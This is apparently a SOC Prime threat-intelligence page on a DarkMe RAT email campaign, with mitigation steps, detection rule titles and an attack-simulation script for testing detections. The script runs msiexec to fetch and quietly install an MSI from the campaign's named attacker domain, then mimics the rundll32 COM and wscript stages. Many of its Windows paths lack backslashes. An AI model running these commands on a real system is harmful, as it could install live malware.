SOC Prime Bias: High

25 Sep 2026 08:20 UTC

DarkMe Email Campaign Widens Targeting in APT RAT Attacks

Author Photo
SOC Prime Team linkedin icon Follow
DarkMe Email Campaign Widens Targeting in APT RAT Attacks
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A new campaign delivering the DarkMe spy-RAT has been observed relying on social engineering rather than software exploits. Attackers distribute a .pif file through email, which initiates a multi-stage infection chain involving MSIEXEC and several VB6-based loaders. The move away from zero-day exploitation toward high-volume social engineering suggests a shift to cheaper, broader, and less selective attack methods.

Investigation

Huntress identified the campaign after detecting a .pif file launching Windows Installer to retrieve a remote MSI package. Analysis uncovered a complex multi-stage chain involving a staging script named prnfig.wsf, registry imports, and execution of a COM object through rundll32.exe /sta. The final stage uses process hollowing to inject the DarkMe payload into the signed Microsoft binary clspack.exe.

Mitigation

Defenders should monitor for rundll32.exe launched with the /sta flag and a GUID without an accompanying DLL path. Security teams should also detect msiexec retrieving remote MSI packages over HTTPS and investigate execution of .pif files. Signed Microsoft binaries running from unusual locations such as %AppData% should receive additional scrutiny.

Response

When suspicious activity is detected, isolate the affected endpoint immediately to disrupt C2 communication and prevent data exfiltration. Terminate the hollowed clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Remove persistence created through the custom URL-protocol handler and the HKCU Run key. Reset affected user credentials and treat any locally stored cryptocurrency wallets as potentially compromised.

Attack Flow

We are still updating this part.

Detections

Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime Team
24 Sep 2026

Unusual Extension of Executable Binary (via process_creation)

SOC Prime Team
24 Sep 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
24 Sep 2026

Possible Remote MSI File Installation Attempt (via cmdline)

SOC Prime Team
24 Sep 2026

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
24 Sep 2026

IOCs (HashSha256) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT

SOC Prime AI Rules
24 Sep 2026

IOCs (SourceIP) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT

SOC Prime AI Rules
24 Sep 2026

IOCs (DestinationIP) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT

SOC Prime AI Rules
24 Sep 2026

Detect C2 Communication and Staging Domain for DarkMe RAT [Windows Network Connection]

SOC Prime AI Rules
24 Sep 2026

Detection of Malicious DarkMe RAT Campaign Activities [Windows Process Creation]

SOC Prime AI Rules
24 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary aims to deploy the DarkMe RAT to maintain persistence. To evade signature-based detection, the attacker uses msiexec to pull a remote payload from a compromised domain (onlineview365.com). Following the initial infection, the attacker uses rundll32.exe to invoke a specific COM object via a GUID to execute code in memory, and subsequently uses cmd.exe to import registry configurations from a text file to prepare the environment for a wscript.exe based payload execution.

  • Regression Test Script:

    # DarkMe RAT Simulation Script
    # This script simulates the exact command lines defined in the Sigma rule.
    
    Write-Host "[+] Starting DarkMe RAT Simulation..." -ForegroundColor Cyan
    
    # 1. Simulate msiexec remote download
    Write-Host "[*] Simulating msiexec remote download..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Simulate rundll32 COM object execution
    Write-Host "[*] Simulating rundll32 COM execution..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. Simulate cmd.exe registry import
    Write-Host "[*] Simulating cmd.exe registry import..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Simulate wscript.exe execution via cmd/rundll32 parent chain
    Write-Host "[*] Simulating wscript.exe execution from AppData..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # To trigger the specific parent/child rule:
    # Parent: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Child: wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Simulation Complete." -ForegroundColor Green
  • Cleanup Commands:

    # Cleanup Simulation Artifacts
    Write-Host "[+] Cleaning up..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Cleanup Finished." -ForegroundColor Green